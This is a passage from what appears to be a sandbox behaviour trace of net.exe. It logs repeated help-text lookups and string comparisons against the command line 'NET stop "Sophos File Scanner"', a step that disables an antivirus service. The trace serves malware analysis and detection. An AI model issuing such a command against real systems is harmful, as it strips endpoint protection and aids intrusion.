[/CLOSE]]\r\n\r\n", _MaxCount=0x1f) returned 13 [0210.380] LocalFree (hMem=0x263f80) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xbe [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET GROUP\r\n[groupname [/COMMENT", _MaxCount=0x1f) returned 12 [0210.380] LocalFree (hMem=0x265870) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x33 [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET HELP\r\ncommand\r\n -or-\r\nN", _MaxCount=0x1f) returned 11 [0210.380] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1f) returned 11 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xc1 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET LOCALGROUP\r\n[groupname [/CO", _MaxCount=0x1f) returned 7 [0210.381] LocalFree (hMem=0x265870) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x16 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 3 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x33 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET SESSION\r\n[\\\\computername] [", _MaxCount=0x1f) returned 15 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x234 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1f) returned 12 [0210.381] LocalFree (hMem=0x265870) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x13 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START BROWSER\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START MESSENGER\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START NET LOGON\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x16 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x11 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START RPCSS\r\n", _MaxCount=0x1f) returned 14 [0210.381] LocalFree (hMem=0x263f80) returned 0x0 [0210.381] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.381] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x12 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START SERVER\r\n", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0xf [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START UPS\r\n", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x17 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x18 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x2a [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET STATISTICS\r\n[WORKSTATION | ", _MaxCount=0x1f) returned 14 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 19 [0210.382] LocalFree (hMem=0x263f80) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x58 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET TIME\r\n\r\n[\\\\computername | /", _MaxCount=0x1f) returned -1 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x184 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET USE\r\n[devicename | *] [\\\\co", _MaxCount=0x1f) returned -2 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xc7 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET USER\r\n[username [password |", _MaxCount=0x1f) returned -2 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x47 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET VIEW\r\n[\\\\computername [/CAC", _MaxCount=0x1f) returned -3 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xc2 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET\r\n [ ACCOUNTS | COMPUTER ", _MaxCount=0x1f) returned 19 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x319 [0210.382] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="SERVICES\r\nNET START can be used", _MaxCount=0x1f) returned -5 [0210.382] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x483 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="SYNTAX\r\nThe following conventio", _MaxCount=0x1f) returned -5 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xa86 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NAMES\r\nThe following types of n", _MaxCount=0x1f) returned 4 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x54 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="\r\nFor more information on tools", _MaxCount=0x1f) returned 97 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xad [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET ACCOUNTS\r\n[/FORCELO", _MaxCount=0x17) returned 18 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x2e [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET COMPUTER\r\n\\\\compute", _MaxCount=0x17) returned 16 [0210.383] LocalFree (hMem=0x263f80) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x7d [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET CONFIG SERVER\r\n[/AU", _MaxCount=0x17) returned 16 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x26 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET CONFIG\r\n[SERVER | W", _MaxCount=0x17) returned 16 [0210.383] LocalFree (hMem=0x263f80) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET CONTINUE\r\nservice\r\n", _MaxCount=0x17) returned 16 [0210.383] LocalFree (hMem=0x263f80) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x1b [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET FILE\r\n[id [/CLOSE]]", _MaxCount=0x17) returned 13 [0210.383] LocalFree (hMem=0x263f80) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xbe [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET GROUP\r\n[groupname [", _MaxCount=0x17) returned 12 [0210.383] LocalFree (hMem=0x265870) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x33 [0210.383] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x17) returned 11 [0210.383] LocalFree (hMem=0x263f80) returned 0x0 [0210.383] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET HELPMSG\r\nmessage#\r\n", _MaxCount=0x17) returned 11 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xc1 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET LOCALGROUP\r\n[groupn", _MaxCount=0x17) returned 7 [0210.384] LocalFree (hMem=0x265870) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x16 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x17) returned 3 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x33 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET SESSION\r\n[\\\\compute", _MaxCount=0x17) returned 15 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x234 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x17) returned 12 [0210.384] LocalFree (hMem=0x265870) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x13 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START BROWSER\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START EVENTLOG\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START MESSENGER\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START NET LOGON\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x16 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x11 [0210.384] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START RPCSS\r\n", _MaxCount=0x17) returned 14 [0210.384] LocalFree (hMem=0x263f80) returned 0x0 [0210.384] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START SCHEDULE\r\n", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x12 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START SERVER\r\n", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0xf [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START UPS\r\n", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x17 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START WORKSTATION\r\n", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x18 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET START\r\n[service]\r\n\r", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x2a [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET STATISTICS\r\n[WORKST", _MaxCount=0x17) returned 14 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x17) returned 19 [0210.385] LocalFree (hMem=0x263f80) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 㾀& ") returned 0x58 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET TIME\r\n\r\n[\\\\computer", _MaxCount=0x17) returned -1 [0210.385] LocalFree (hMem=0x269870) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0x184 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET USE\r\n[devicename | ", _MaxCount=0x17) returned -2 [0210.385] LocalFree (hMem=0x269870) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0xc7 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET USER\r\n[username [pa", _MaxCount=0x17) returned -2 [0210.385] LocalFree (hMem=0x269870) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0x47 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET VIEW\r\n[\\\\computerna", _MaxCount=0x17) returned -3 [0210.385] LocalFree (hMem=0x269870) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0xc2 [0210.385] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NET\r\n [ ACCOUNTS | C", _MaxCount=0x17) returned 19 [0210.385] LocalFree (hMem=0x269870) returned 0x0 [0210.385] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0x319 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="SERVICES\r\nNET START can", _MaxCount=0x17) returned -5 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0x483 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", 